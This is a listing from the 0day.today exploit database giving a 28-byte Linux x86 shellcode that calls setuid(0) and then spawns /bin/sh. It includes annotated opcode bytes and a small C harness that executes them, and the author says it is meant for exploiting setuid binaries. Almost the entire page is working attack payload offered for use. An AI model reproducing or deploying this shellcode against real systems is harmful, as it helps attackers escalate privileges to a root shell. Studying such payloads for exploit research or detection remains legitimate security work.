[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 setuid(0) + execve(/bin/sh) 28 bytes

Author
Revenge
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-7183
Category
shellcode
Date add
16-11-2006
Platform
linux/x86
==============================================
linux/x86 setuid(0) + execve(/bin/sh) 28 bytes
==============================================






/*
 * revenge-setuid.c, v1.0 2006/09/30 14:57
 *
 * linux/x86 setuid(0) + execve("/bin//sh", ["/bin//sh"], NULL) shellcode
 * once again...
 *
 * [    setuid (6 bytes) + execve (22 bytes)  = 28 bytes       ]
 * [                                                           ]
 * [    Same as revenge-execve.c we start the 2 system         ]
 * [    calls with a mov resulting in 2 bytes less, but        ]
 * [    this one is only for suid binary exploitation.         ]
 * [                                                           ]
 *
 * http://www.0xcafebabe.it
 * <revenge@0xcafebabe.it>
 *
 */

char sc[] =
                                     // <_start>
       "\xb0\x17"                    // mov    $0x17,%al
       "\x31\xdb"                    // xor    %ebx,%ebx
       "\xcd\x80"                    // int    $0x80
       "\xb0\x0b"                    // mov    $0xb,%al
       "\x99"                        // cltd
       "\x52"                        // push   %edx
       "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
       "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
       "\x89\xe3"                    // mov    %esp,%ebx
       "\x52"                        // push   %edx
       "\x53"                        // push   %ebx
       "\x89\xe1"                    // mov    %esp,%ecx
       "\xcd\x80"                    // int    $0x80
;

int main()
{
       void    (*fp)(void) = (void (*)(void))sc;

       printf("Length: %d\n",strlen(sc));
       fp();
}



#  0day.today [2024-12-25]  #